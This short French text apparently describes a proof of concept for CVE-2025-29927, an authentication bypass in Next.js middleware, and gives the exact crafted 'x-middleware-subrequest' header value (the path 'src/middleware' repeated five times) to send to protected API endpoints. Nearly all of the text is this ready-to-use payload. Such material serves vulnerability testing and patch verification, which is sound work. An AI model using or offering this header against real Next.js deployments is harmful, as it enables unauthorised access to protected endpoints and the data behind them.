
Preuve de concept pour CVE-2025-29927 qui contourne l'authentification middleware de Next.js en envoyant un en-tête x-middleware-subrequest conçu à des points de terminaison API protégés.
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware comme en-tête